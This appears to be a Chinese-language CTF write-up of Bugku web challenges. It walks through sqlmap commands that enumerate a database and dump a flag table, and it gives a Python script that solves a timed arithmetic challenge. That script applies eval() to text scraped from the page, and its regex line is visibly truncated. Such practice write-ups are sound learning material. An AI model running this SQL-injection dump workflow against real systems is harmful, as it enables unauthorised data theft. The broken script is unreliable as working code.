继上一篇总结:
CTF web题型总结-第五课 CTF WEB实战练习(一)
以下也是我在bugku练习的解题过程。
以下内容大多是我在Bugku自己操作练习,有部分来源于网络,我只是在前人的基础上,对CET WEB进行一个总结;
-----------------------------------------------------------------------
-----------------------------------------------------------------------
入门第一部分
bugku-ctf 第一题:成绩单
http://123.206.87.240:8002/chengjidan/
猜测应该是考sql注入
先用Burpsuite抓一下数据包吧
数据包新建成1.txt。放到sqlmap下
使用sqlmap跑注入吧。
然后就是需要了解下sqlmap的使用方式。
sqlmap.py -r 1.txt -p id –current-db
-r –>加载一个文件-p –>指定参数–current-db–>获取当前数据库名称(current前有两个-)
可以看到它的数据库为 ‘skctf_flag’,接着就是爆表sqlmap.py -r 1.txt -p id -D skctf_flag --tables-D –>指定数据库名称–tables–>列出数据库中的表(tables前有两个-)
可以看到当前数据库中有两个表,很明显,flag应该在fl4g表中,下面就是该爆出表中的字段了sqlmap.py -r 1.txt -p id -D skctf_flag -T fl4g--columns-T –>指定表名称–columns–>列出表中的字段
fl4g表中有一个名为skctf_flag字段,最后列出字段信息就可以啦。sqlmap.py -r 1.txt -p id -D skctf_flag -T fl4g -C skctf_flag --dump–dump–>列出字段数据(dump前有两个-)
得到
BUGKU{Sql_INJECT0N_4813drd8hz4}
这个题的知识点sql注入
bugku-ctf 第二题:秋名山老司机
打开连接
打开链接,让我们在2秒之内计算出一个很复杂的式子的值传进去
直接上图一脚本:
import re # import 是导入模块 相当于就是导入函数库 导入模块过后就可以用相应的模块里的函数 这里的re模块是正则表达式 用于匹配字符串当中的一定字符但是说匹配这里却用来提取字符。
import requests #导入requests模块请求模块 这个模块还有很多需要我学习。
s = requests.Session() # 用s存session session和cookie都用于身份识别session本义为对话 这里我自己暂时理解为 把这次对话保存起来并取名s相当于记录身份。
r =s.get("http://120.24.86.145:8002/qiumingshan/") #用此身份请求并url。
searchObj =re.search(r'^
d = {
"value": eval(searchObj.group(1)) #eval函数是计算值
}
r =s.post("http://120.24.86.145:8002/qiumingshan/", data=d) #post传值
print(r.text) #输出结果
得出flag
bugku-ctf 第三题:速度要快